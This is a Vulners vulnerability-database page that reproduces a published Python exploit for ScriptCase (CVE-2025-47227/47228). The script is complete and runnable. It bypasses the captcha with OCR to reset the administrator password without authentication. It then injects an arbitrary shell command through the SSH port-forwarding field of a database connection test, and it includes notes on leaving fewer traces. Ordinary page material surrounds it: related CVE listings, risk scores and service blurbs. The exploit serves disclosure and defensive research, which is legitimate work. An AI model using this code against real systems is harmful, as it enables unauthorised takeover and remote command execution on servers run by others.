Vulners
Lucene search
📄 ScriptCase Remote Command Execution
🗓️ 07 Jul 2025 00:00:00Reported by Alexandre Droullé, Alexandre ZanniType 
packetstorm🔗 packetstorm.news👁 88 Views
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Exploit for CVE-2025-47227 | 9 May 202507:34 | – | githubexploit |
| Exploit for CVE-2025-47227 | 29 Jul 202510:51 | – | githubexploit |
| Exploit for CVE-2025-47227 | 28 May 202609:52 | – | githubexploit |
 | CVE-2025-47227 | 5 Jul 202505:35 | – | circl |
| CVE-2025-47228 | 5 Jul 202505:25 | – | circl |
 | Scriptcase 安全漏洞 | 4 Jul 202500:00 | – | cnnvd |
| Scriptcase 操作系统命令注入漏洞 | 4 Jul 202500:00 | – | cnnvd |
 | CVE-2025-47227 | 5 Jul 202500:00 | – | cve |
| CVE-2025-47228 | 5 Jul 202500:00 | – | cve |
 | CVE-2025-47227 | 5 Jul 202500:00 | – | cvelist |
10
# Exploit Title: ScriptCase - Pre-Authenticated Remote Command Execution
# Date: 04/07/2025
# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)
# Tested on: EndeavourOS
# CVE : CVE-2025-47227, CVE-2025-47228
# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228
# Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution
# Imports
## stdlib
import io
import random
import optparse
import re
import string
import sys
import urllib.parse
## third party
from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow
import pytesseract # pip3 install pytesseract
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
# Clean image + OCR
def process_image(input_image, output_image_path=None):
# Open the image
img = Image.open(io.BytesIO(input_image))
# Convert the image to RGB (in case it's in a different mode)
img = img.convert('RGB')
# Load the pixel data
pixels = img.load()
# Get the dimensions of the image
width, height = img.size
# Process each pixel
for y in range(height):
for x in range(width):
r, g, b = pixels[x, y]
# Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)
if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):
pixels[x, y] = (211, 211, 211) # Change the pixel to light grey
elif (r, g, b) == (255, 255, 255): # Change white text in black text
pixels[x, y] = (0, 0, 0) # Change the pixel to black
# Size (200, 50) * 5
img = img.resize((1000,250), Image.Resampling.HAMMING)
# Use Tesseract to convert the image to text
# psm 6 or 8 work best
# limit alphabet
# disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns
custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative
text = pytesseract.image_to_string(img, config=custom_oem_psm_config)
return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added
# Step 1: Set is_page to true on the session
def prepare_session(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/iface/login.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Session prepared")
else:
print(f"[-] Failed with status code {res.status_code}")
# Random hex string of arbitrary size
def rand_hex(size):
return ''.join(random.choice('0123456789abcdef') for _ in range(size))
# Step 2: Get a captcha challenge for the session
def captcha_session(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Captcha retrieved")
return res.content
else:
print(f"[-] Failed with status code {res.status_code}")
# Step 3: Change the password with the prepared session
def reset_password(url_base, cookies, captcha_img, captcha_txt):
new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))
email = f'{rand_hex(10)}@{rand_hex(8)}.com'
data = {
'ajax': 'nm',
'nm_action': 'change_pass',
'email': email,
'pass_new': new_password,
'pass_conf': new_password,
'lang': 'en-us',
'captcha': captcha_txt
}
res = requests.post(
f'{url_base}/prod/lib/php/devel/iface/login.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200 and res.text == '{"result":"success"}':
print("[+] Password reset successfully")
print(f"[+] The new password is: {new_password}")
print(f"[+] The delcared (fake) email address was: {email}")
elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}':
print("[-] OCR failed")
print(f"[-] Failed captcha submission was {captcha_txt}")
img = Image.open(io.BytesIO(captcha_img))
img.show()
manual_input = input("[+] Input displayed captcha to retry manually: ")
reset_password(url_base, cookies, captcha_img, manual_input)
elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}':
print("[-] Non default password policy")
print("[-] Hardcode a password that matches it")
print(f"[-] Failed password is: {new_password}")
else:
print(f"[-] Failed with status code {res.status_code}")
print(res.text)
print('[-] Data was:')
print(data)
# Detect the deployment path of ScriptCase and produciton environment from the homepage.
# E.g. deployment path is /scriptcase/
# sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/'
# ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php
# Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php
def detect_deployment_path(homepage_url):
res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects)
if res.status_code == 200:
print("[+] Looking for deployment path in JS and computing login paths")
reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';"
match = re.search(reg, res.text)
# compute URL without path
parsed_url = urllib.parse.urlparse(homepage_url)
homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}"
if match:
base_path = match.group(1)
print(f"[+] Deployment path found: {base_path}/")
print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)")
print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
else: # either a website not made with ScriptCase or root redirects to the devel page
js_redirect(res)
# try to detect the devel/iface/login.php page
reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first'
match = re.search(reg2, res.text)
if match: # devel page
print(f"[?] This may be the development console?")
# now try to extract path from favicon
reg3 = r'<link rel="shortcut icon" href="(.+)/devel/conf/scriptcase/img/ico/favicon\.ico"'
match = re.search(reg3, res.text)
if match: # base path found
base_path = match.group(1)
print(f"[+] Deployment path found: {base_path}/")
print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php")
print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
else: # false positive, it's not devel page
print(f"[-] Failed to find deployment path, is this site made with ScriptCase?")
else: # no ScriptCase detected
print("[-] Failed to find deployment path, is this site made with ScriptCase?")
else:
print(f"[-] Failed with status code {res.status_code}")
# Try to handle JS redirect else warn and exit
def js_redirect(res):
if re.search(r'window\.location', res.text):
print('[-] JavaScript redirection detected')
print('[-] JavaScript redirection not handled (no headless browser with JS engine)')
print(f"[-] Returned page is:\n{res.text}")
print(f"[-] Last redirection URL is:\n{res.url}")
match = re.search(r"window\.location\s*=\s*['\"](.+)['\"]", res.text)
if match:
redirect_url = f"{res.url}/{match.group(1)}"
print(f"[?] Let's try again with: {redirect_url}")
detect_deployment_path(redirect_url)
else:
print('Please try again with redirect URL')
exit(1)
# Remote command execution on the system
#
# Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it
# (admin_sys_allconections_test.php) so we leave less traces.
# Even if the test results in "Connection Error" / "Unable to connect", the command was stil lexecuted.
def command_injection(url_base, cookies, cmd):
data = {
'hid_create_connect': 'S',
'dbms': 'mysql',
'conn': 'conn_mysql',
'dbms': 'pdo_mysql',
'host': '127.0.0.1:3306',
'server': '127.0.0.1',
'port': '3306',
'user': rand_hex(11),
'pass': rand_hex(8),
'show_table': 'Y',
'show_view': 'Y',
'show_system': 'Y',
'show_procedure': 'Y',
'decimal': '.',
'use_persistent': 'N',
'use_schema': 'N',
'retrieve_schema': 'Y',
'retrieve_schema': 'Y',
'use_ssh': 'Y',
'ssh_server': '127.0.0.1',
'ssh_user': 'root',
'ssh_port': '22',
'ssh_localportforwarding': f'; {cmd};#',
'ssh_localserver': '127.0.0.1',
'ssh_localport': '3306',
'form_create': form_create(url_base, cookies),
'retornar': 'Back',
'concluir': 'Save',
'confirmar': 'Back',
'voltar': 'Confirm',
'step': 'sgdb2',
'nextstep': 'dados_rep'
}
res = requests.post(
f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_test.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Command executed (blind)")
else:
print(f"[-] Failed with status code {res.status_code}")
exit(1)
# Get form_create ID for command_injection()
def form_create(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_create_wizard.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Parsing results to find form_create ID")
soup = BeautifulSoup(res.text, 'html.parser')
form_create = soup.css.select_one('html body.nmPage form input[name="form_create"]')
if form_create:
form_create_id = form_create.get('value')
print(f"[+] form_create ID found: {form_create_id}")
return form_create_id
else:
print("[-] No form_create ID found")
exit(1)
return res.content
else:
print(f"[-] Failed with status code {res.status_code}")
exit(1)
# Handles login
#
# Comes with a cookie as there is session fixation (cookie not renewed after login)
def login(url_base, cookies, password):
data = {
'option': 'login',
'opt_par': None,
'hid_login': 'S',
'field_pass': password,
'field_language': 'en-us'
}
res = requests.post(
f'{url_base}/prod/lib/php/nm_ini_manager2.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Authentication successful")
else:
print("[-] Authentication failed")
# Exploit
if __name__ == '__main__':
help_text = """
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
"""
parser = optparse.OptionParser(usage=help_text)
parser.add_option('-u', '--base-url')
parser.add_option('-c', '--command')
parser.add_option('-p', '--password')
parser.add_option('-d', '--detect', action='store_true', dest='detect')
opts, args = parser.parse_args()
cookies = {
'PHPSESSID': rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string)
}
URL_BASE = opts.base_url
if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE)
prepare_session(URL_BASE, cookies)
captcha_img = captcha_session(URL_BASE, cookies)
captcha_txt = process_image(captcha_img)
reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
command_injection(URL_BASE, cookies, opts.command)
elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth)
prepare_session(URL_BASE, cookies)
captcha_img = captcha_session(URL_BASE, cookies)
captcha_txt = process_image(captcha_img)
reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account)
prepare_session(URL_BASE, cookies)
login(URL_BASE, cookies, opts.password)
command_injection(URL_BASE, cookies, opts.command)
elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path
detect_deployment_path(URL_BASE)
else:
parser.print_help()
sys.exit(1)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jul 2025 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.17.5
EPSS0.14441
SSVC